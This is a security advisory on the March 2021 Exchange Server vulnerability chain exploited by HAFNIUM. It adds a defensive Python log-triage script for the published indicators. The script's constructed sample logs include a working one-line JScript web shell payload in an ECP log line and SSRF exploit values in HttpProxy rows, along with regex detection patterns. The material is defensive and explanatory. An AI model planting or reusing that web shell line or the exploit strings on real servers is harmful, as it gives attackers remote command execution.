State Sponsored Attackers Targeting Microsoft Exchange Vulnerabilities

Overview

Microsoft urges Exchange users to patch the servers immediately as multiple threat actors, including state sponsored attackers are actively exploiting multiple critical vulnerabilities patched recently.

Description

Microsoft warns of increasing attacks against unpatched Exchange Servers affected by multiple critical vulnerabilities. Microsoft released out-of-band security updates on March 2, 2021, ahead of its regular monthly release, because the flaws were already being exploited in the wild by a state sponsored actor.

Among the vulnerabilities, CVE-2021-26855, a Server-Side Request Forgery (SSRF) vulnerability, is the most critical because it is the entry point of the chain: it lets an unauthenticated attacker send arbitrary HTTP requests to the Exchange back end and authenticate as the Exchange server itself. Exploitation only requires that the attacker can reach the Exchange server on port 443 from an untrusted network. Once authentication is bypassed in this way, the attacker can chain the three post-authentication vulnerabilities (CVE-2021-26857, CVE-2021-26858, CVE-2021-27065).

CVE-2021-26857 is an insecure deserialization vulnerability in the Unified Messaging service that allows an attacker to run arbitrary code as SYSTEM on the Exchange server; on its own it requires administrator permission or another vulnerability to exploit. The other two post-authentication vulnerabilities (CVE-2021-26858 and CVE-2021-27065) allow an attacker who has authenticated, for example through the SSRF, to write a file with attacker-controlled content to any path on the server, which is how web shells are planted.

As reported by Microsoft, HAFNIUM, a group Microsoft assesses to be state sponsored and operating out of China, has been actively exploiting the vulnerabilities. According to the threat intelligence report, the actors deploy web shells (ASPX files written into web-accessible directories) after the initial exploitation to keep access to the server, and that access survives patching: the update closes the vulnerabilities but does not remove a web shell that is already in place. Microsoft also expects attacks to grow as other threat actors develop automated exploits for the now public vulnerabilities.
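Because patching does not evict an attacker who already has a web shell, the practical next step after the update is to check the server's own logs for the indicators Microsoft published for this chain: HttpProxy log rows whose AnchorMailbox matches ServerInfo~*/* or whose BackEndCookie matches Server~*/*~* (CVE-2021-26855), and ECP server log lines containing a Set-*VirtualDirectory command (CVE-2021-27065, the OAB virtual directory trick used to drop a web shell). The following Python is an added example, not Microsoft's Test-ProxyLogon.ps1 and not code from this advisory. It assumes the HttpProxy logs are CSV with a header row that includes the columns DateTime, ClientIpAddress, AnchorMailbox and BackEndCookie (the real logs have many more columns); the ECP lines and the log excerpts are constructed for the example, and the ECP check is a plain regex over each line, so it does not depend on that log's exact layout.

```python
"""
Log triage for the Exchange March 2021 indicators.
Added example (not Microsoft's Test-ProxyLogon.ps1, not from the advisory).

Indicators checked:
  * CVE-2021-26855 (SSRF): HttpProxy rows whose AnchorMailbox matches
    'ServerInfo~*/*' or whose BackEndCookie matches 'Server~*/*~*'.
  * CVE-2021-27065 (file write): ECP server log lines carrying a
    'Set-*VirtualDirectory' command; lines that also contain script
    content or an .aspx path are the classic web shell drop (rated high),
    every other virtual directory write is flagged for review.
Assumptions: HttpProxy logs are CSV with a header row containing the
column names used below; the sample logs are constructed.
"""
from __future__ import annotations

import csv
import fnmatch
import io
import re
from dataclasses import dataclass

# Globs from Microsoft's hunting guidance (PowerShell -like syntax).
SSRF_ANCHOR_GLOB = "ServerInfo~*/*"
SSRF_COOKIE_GLOB = "Server~*/*~*"
# Any virtual directory write deserves a look; script or .aspx is the web shell signature.
VDIR_WRITE_RE = re.compile(r"Set-\w+VirtualDirectory", re.IGNORECASE)
WEBSHELL_RE = re.compile(r"<script|runat=|\.aspx", re.IGNORECASE)

# Constructed HttpProxy excerpt (subset of the real columns): one AnchorMailbox
# hit, one BackEndCookie hit, two benign rows. Hosts/IPs are documentation values.
HTTPPROXY_LOG = """\
DateTime,ClientIpAddress,UrlStem,AnchorMailbox,BackEndCookie,ErrorCode
2021-03-03T10:14:02.130Z,203.0.113.10,/owa/auth/logon.aspx,,,
2021-03-03T10:14:05.412Z,198.51.100.7,/owa/auth/x.js,ServerInfo~a]@exch01.corp.example/ecp/DDI/DDIService.svc/SetObject?msExchEcpCanary=abc#~1941962753,,
2021-03-03T10:14:06.001Z,198.51.100.7,/ecp/y.js,,Server~exch01.corp.example/ecp/DDI/DDIService.svc/SetObject#~1941962753,
2021-03-03T10:20:40.900Z,203.0.113.44,/EWS/Exchange.asmx,alice@corp.example,,
"""

# Constructed ECP server log lines (free text; the real format is richer).
ECP_LOG = """\
2021-03-03T10:14:09.210Z S:CMD=Set-OabVirtualDirectory;S:ExternalUrl=http://f/<script language="JScript" runat="server">eval(Request["cmd"]);</script>
2021-03-03T10:14:10.000Z S:CMD=Set-OabVirtualDirectory;S:ExternalUrl=https://mail.corp.example/OAB
2021-03-03T09:00:00.000Z S:CMD=Get-Mailbox;S:Identity=alice
"""


@dataclass(frozen=True)
class Finding:
    cve: str
    severity: str      # "high" or "review"
    timestamp: str
    client_ip: str     # empty when the log does not carry one
    detail: str


def scan_httpproxy(csv_text: str) -> list[Finding]:
    """One Finding per HttpProxy row matching an SSRF indicator."""
    findings: list[Finding] = []
    for row in csv.DictReader(io.StringIO(csv_text)):
        anchor = row.get("AnchorMailbox") or ""
        cookie = row.get("BackEndCookie") or ""
        if fnmatch.fnmatchcase(anchor, SSRF_ANCHOR_GLOB):
            detail = f"AnchorMailbox={anchor}"
        elif fnmatch.fnmatchcase(cookie, SSRF_COOKIE_GLOB):
            detail = f"BackEndCookie={cookie}"
        else:
            continue
        findings.append(Finding("CVE-2021-26855", "high", row["DateTime"],
                                row.get("ClientIpAddress") or "", detail))
    return findings


def scan_ecp(log_text: str) -> list[Finding]:
    """One Finding per ECP line that writes a virtual directory."""
    findings: list[Finding] = []
    for line in log_text.splitlines():
        if not VDIR_WRITE_RE.search(line):
            continue
        severity = "high" if WEBSHELL_RE.search(line) else "review"
        timestamp = line.split(" ", 1)[0]
        findings.append(Finding("CVE-2021-27065", severity, timestamp, "", line.strip()))
    return findings


def triage(httpproxy_text: str, ecp_text: str) -> list[Finding]:
    """Combined findings in time order, so the SSRF hit and the file write line up."""
    return sorted(scan_httpproxy(httpproxy_text) + scan_ecp(ecp_text),
                  key=lambda f: f.timestamp)


if __name__ == "__main__":
    for f in triage(HTTPPROXY_LOG, ECP_LOG):
        print(f"{f.timestamp} {f.cve} [{f.severity}] {f.client_ip} {f.detail}")
```

On a real server the same functions run over the files under the Exchange install's Logging\HttpProxy and Logging\ECP\Server directories; a hit is a lead to pivot on (the client IP, the minutes around the timestamp, new .aspx files in web-accessible paths), not proof by itself, since the patterns can also match unusual but legitimate traffic.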

Note that the vulnerabilities affect only on-premises Exchange Server 2013, 2016 and 2019; Exchange Online is not affected, but hybrid deployments still run an on-premises server that must be patched.

Impact

An attacker who successfully exploits CVE-2021-26855 over an untrusted connection to the Exchange server on port 443 bypasses authentication and can act as the Exchange server; chained with the post-authentication vulnerabilities below, this leads to arbitrary code execution on the server.

Impact Summary (CVE-2021-26855)

Category: Server Side Request Forgery (SSRF)
CVSS 3.1 Base Score: 9.8 Critical
CVSS 3.1 Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

An attacker who successfully exploits the CVE-2021-26857 vulnerability could run arbitrary code as SYSTEM on the Exchange server via Insecure Deserialization.

Impact Summary (CVE-2021-26857)

Category: Insecure Deserialization
CVSS 3.1 Base Score: 7.8 High
CVSS 3.1 Vector: AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

An attacker who successfully exploits CVE-2021-26858 or CVE-2021-27065 could write a file with attacker-controlled content to any path on the Exchange server, including web-accessible directories.

Impact Summary (CVE-2021-26858 and CVE-2021-27065)

Category: Arbitrary File Write (post-authentication)
CVSS 3.1 Base Score: 7.8 High
CVSS 3.1 Vector: AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Solution (Update/Workaround)

To defend against attacks exploiting the announced vulnerabilities, Exchange Server 2013, 2016 and 2019 should be updated according to the Microsoft Security Response Center guidance. Because a web shell planted before the update keeps working afterwards, patching should be followed by a check of the server for indicators of compromise.

Workarounds exist for the foothold vulnerability CVE-2021-26855 where the update cannot be applied immediately. Since it requires an untrusted connection over port 443, restricting that port to trusted networks or requiring a VPN to reach the Exchange server blocks the initial step of the chain. This only protects against the initial portion of the attack: the post-authentication vulnerabilities can still be exploited by an attacker who already has access, or who tricks an administrator into running a malicious file, so these mitigations are a stopgap and not a substitute for the update.

